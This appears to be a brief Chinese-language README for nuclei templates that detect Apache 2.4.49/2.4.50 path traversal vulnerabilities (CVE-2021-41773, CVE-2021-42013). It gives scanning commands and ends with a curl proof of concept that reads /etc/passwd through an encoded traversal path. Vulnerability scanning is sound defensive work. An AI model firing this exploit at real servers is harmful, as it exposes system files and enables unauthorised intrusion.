Apache 版本 2.4.49 和 2.4.50
(CVE-2021-41773) 和 (CVE-2021-42013)
你需要安装 nuclei!
https://github.com/projectdiscovery/nuclei
检查本地 nuclei 安装并验证模板
nuclei -t apache-vulnerable-versions.yaml -vv
以及
nuclei -t apache-path-traversal-rce-v2.yaml -vv
你应该会看到
[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high]
以及
[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]
扫描目标:
nuclei --silent -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port
扫描文件中的目标:
nuclei --silent -t apache-vulnerable-versions.yaml -l hosts.txt
apache-vulnerable-versions.yaml - 检测Apache版本,如果存在漏洞则输出 HIGH。

apache-path-traversal-rce-v2.yaml - 将运行一个漏洞利用,并显示存在漏洞的路径。如果存在漏洞则输出 CRITICAL。

POC(概念验证):
curl -s -k https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
